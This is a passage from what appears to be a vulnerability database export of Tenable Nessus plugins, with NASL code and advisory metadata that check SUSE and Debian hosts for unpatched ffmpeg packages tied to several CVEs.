== \"SLES15\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0/1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavcodec57-32bit-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavcodec57-32bit-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavdevice57-32bit-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavdevice57-32bit-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavfilter6-32bit-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavfilter6-32bit-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavformat57-32bit-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavformat57-32bit-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavresample3-32bit-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavresample3-32bit-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavutil55-32bit-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavutil55-32bit-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libpostproc54-32bit-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libpostproc54-32bit-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libswresample2-32bit-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libswresample2-32bit-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libswscale4-32bit-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libswscale4-32bit-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"ffmpeg-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"ffmpeg-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"ffmpeg-debugsource-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"ffmpeg-private-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libavcodec57-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libavcodec57-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libavdevice-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libavdevice57-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libavdevice57-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libavfilter-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libavfilter6-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libavfilter6-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libavutil-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libavutil55-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libavutil55-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libpostproc-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libpostproc54-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libpostproc54-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libswresample-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libswresample2-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libswresample2-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libswscale-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libswscale4-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libswscale4-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"ffmpeg-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"ffmpeg-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"ffmpeg-debugsource-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"ffmpeg-private-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libavcodec57-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libavcodec57-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libavdevice-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libavdevice57-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libavdevice57-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libavfilter-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libavfilter6-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libavfilter6-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libavutil-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libavutil55-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libavutil55-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libpostproc-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libpostproc54-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libpostproc54-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libswresample-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libswresample2-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libswresample2-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libswscale-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libswscale4-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libswscale4-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavcodec57-32bit-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavcodec57-32bit-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavdevice57-32bit-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavdevice57-32bit-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavfilter6-32bit-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavfilter6-32bit-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavformat57-32bit-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavformat57-32bit-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavresample3-32bit-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavresample3-32bit-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavutil55-32bit-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libavutil55-32bit-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libpostproc54-32bit-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libpostproc54-32bit-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libswresample2-32bit-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libswresample2-32bit-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libswscale4-32bit-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libswscale4-32bit-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"ffmpeg-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"ffmpeg-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"ffmpeg-debugsource-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"ffmpeg-private-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libavcodec57-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libavcodec57-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libavdevice-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libavdevice57-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libavdevice57-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libavfilter-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libavfilter6-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libavfilter6-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libavutil-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libavutil55-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libavutil55-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libpostproc-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libpostproc54-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libpostproc54-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libswresample-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libswresample2-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libswresample2-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libswscale-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libswscale4-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libswscale4-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"ffmpeg-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"ffmpeg-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"ffmpeg-debugsource-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"ffmpeg-private-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libavcodec57-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libavcodec57-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libavdevice-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libavdevice57-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libavdevice57-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libavfilter-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libavfilter6-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libavfilter6-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libavutil-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libavutil55-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libavutil55-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libpostproc-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libpostproc54-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libpostproc54-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libswresample-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libswresample2-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libswresample2-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libswscale-devel-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libswscale4-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libswscale4-debuginfo-3.4.2-4.27.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ffmpeg\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-19T12:34:27", "description": "This update for ffmpeg fixes the following issues :\n\nSecurity issues fixed: CVE-2019-17542: Fixed a heap-buffer overflow in vqa_decode_chunk due to an out-of-array access (bsc#1154064).\n\nCVE-2019-12730: Fixed an uninitialized use of variables due to an improper check (bsc#1137526).\n\nCVE-2019-9718: Fixed a denial of service in the subtitle decode (bsc#1129715).\n\nCVE-2018-13301: Fixed a denial of service while converting a crafted AVI file to MPEG4 (bsc#1100352).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-09T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : ffmpeg (SUSE-SU-2019:3184-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-13301", "CVE-2019-12730", "CVE-2019-17542", "CVE-2019-9718"], "modified": "2020-12-07T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:ffmpeg", "p-cpe:/a:novell:suse_linux:ffmpeg-debuginfo", "p-cpe:/a:novell:suse_linux:ffmpeg-debugsource", "p-cpe:/a:novell:suse_linux:libavdevice57", "p-cpe:/a:novell:suse_linux:libavdevice57-debuginfo", "p-cpe:/a:novell:suse_linux:libavfilter6", "p-cpe:/a:novell:suse_linux:libavfilter6-debuginfo", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2019-3184-2.NASL", "href": "https://www.tenable.com/plugins/nessus/138253", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:3184-2.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138253);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/07\");\n\n script_cve_id(\"CVE-2018-13301\", \"CVE-2019-12730\", \"CVE-2019-17542\", \"CVE-2019-9718\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : ffmpeg (SUSE-SU-2019:3184-2)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for ffmpeg fixes the following issues :\n\nSecurity issues fixed: CVE-2019-17542: Fixed a heap-buffer overflow in\nvqa_decode_chunk due to an out-of-array access (bsc#1154064).\n\nCVE-2019-12730: Fixed an uninitialized use of variables due to an\nimproper check (bsc#1137526).\n\nCVE-2019-9718: Fixed a denial of service in the subtitle decode\n(bsc#1129715).\n\nCVE-2018-13301: Fixed a denial of service while converting a crafted\nAVI file to MPEG4 (bsc#1100352).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1100352\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1129715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1137526\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1154064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-13301/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-12730/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-17542/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-9718/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20193184-2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9cd86eb0\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Packagehub Subpackages 15-SP1 :\n\nzypper in -t patch\nSUSE-SLE-Module-Packagehub-Subpackages-15-SP1-2020-1867=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-17542\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ffmpeg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ffmpeg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ffmpeg-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavdevice57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavdevice57-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavfilter6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavfilter6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"ffmpeg-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"ffmpeg-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"ffmpeg-debugsource-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libavdevice57-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libavdevice57-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libavfilter6-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libavfilter6-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"ffmpeg-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"ffmpeg-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"ffmpeg-debugsource-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libavdevice57-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libavdevice57-debuginfo-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libavfilter6-3.4.2-4.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libavfilter6-debuginfo-3.4.2-4.27.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ffmpeg\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:20:54", "description": "Several vulnerabilities have been discovered in the FFmpeg multimedia framework, which could result in denial of service or potentially the execution of arbitrary code if malformed files/streams are processed.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-08-20T00:00:00", "type": "nessus", "title": "Debian DSA-4502-1 : ffmpeg - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-12730"], "modified": "2020-01-02T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:ffmpeg", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4502.NASL", "href": "https://www.tenable.com/plugins/nessus/127929", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4502. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(127929);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2020/01/02\");\n\n script_cve_id(\"CVE-2019-12730\");\n script_xref(name:\"DSA\", value:\"4502\");\n\n script_name(english:\"Debian DSA-4502-1 : ffmpeg - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n 